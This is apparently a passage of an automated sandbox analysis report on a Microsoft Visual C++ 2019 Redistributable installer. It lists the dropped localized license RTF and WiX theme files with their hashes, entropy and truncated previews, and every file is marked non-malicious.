                                                                        SHA-512:EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1028\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1029\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13053
                                                                        Entropy (8bit):5.125552901367032
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
                                                                        MD5:B408556A89FCE3B47CD61302ECA64AC9
                                                                        SHA1:AAC1CDAF085162EFF5EAABF562452C93B73370CB
                                                                        SHA-256:21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
                                                                        SHA-512:BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1029\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1031\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11936
                                                                        Entropy (8bit):5.194264396634094
                                                                        Encrypted:false
                                                                        SSDEEP:192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
                                                                        MD5:C2CFA4CE43DFF1FCD200EDD2B1212F0A
                                                                        SHA1:E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
                                                                        SHA-256:F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
                                                                        SHA-512:6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1031\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1036\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11593
                                                                        Entropy (8bit):5.106817099949188
                                                                        Encrypted:false
                                                                        SSDEEP:192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
                                                                        MD5:F0FF747B85B1088A317399B0E11D2101
                                                                        SHA1:F13902A39CEAE703A4713AC883D55CFEE5F1876C
                                                                        SHA-256:4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
                                                                        SHA-512:AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\*\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1036\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1040\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11281
                                                                        Entropy (8bit):5.046489958240229
                                                                        Encrypted:false
                                                                        SSDEEP:192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
                                                                        MD5:9D98044BAC59684489C4CF66C3B34C85
                                                                        SHA1:36AAE7F10A19D336C725CAFC8583B26D1F5E2325
                                                                        SHA-256:A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
                                                                        SHA-512:D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\p

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1040\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1041\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28232
                                                                        Entropy (8bit):3.7669201853275722
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
                                                                        MD5:8C49936EC4CF0F64CA2398191C462698
                                                                        SHA1:CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
                                                                        SHA-256:7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
                                                                        SHA-512:4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS Gothic;}{\f1\fnil\fcharset0 MS Gothic;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67 \'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41 \'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\par..\f1 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation (\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'c4\'82\'cd\'82\'bb\'82\'cc\'8a\'d6\'98\'41\'89\'ef\'8e\'d0) \'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\'81\'42\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1041\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1042\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):27936
                                                                        Entropy (8bit):3.871317037004171
                                                                        Encrypted:false
                                                                        SSDEEP:384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
                                                                        MD5:184D94082717E684EAF081CEC3CBA4B1
                                                                        SHA1:960B9DA48F4CDDF29E78BBAE995B52204B26D51B
                                                                        SHA-256:A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
                                                                        SHA-512:E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'ba\'bb\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 \f1\'c0\'a7\'bf\'a1\f0 \f1\'b8\'ed\'bd\'c3\'b5\'c8\f0 \f1

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1042\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
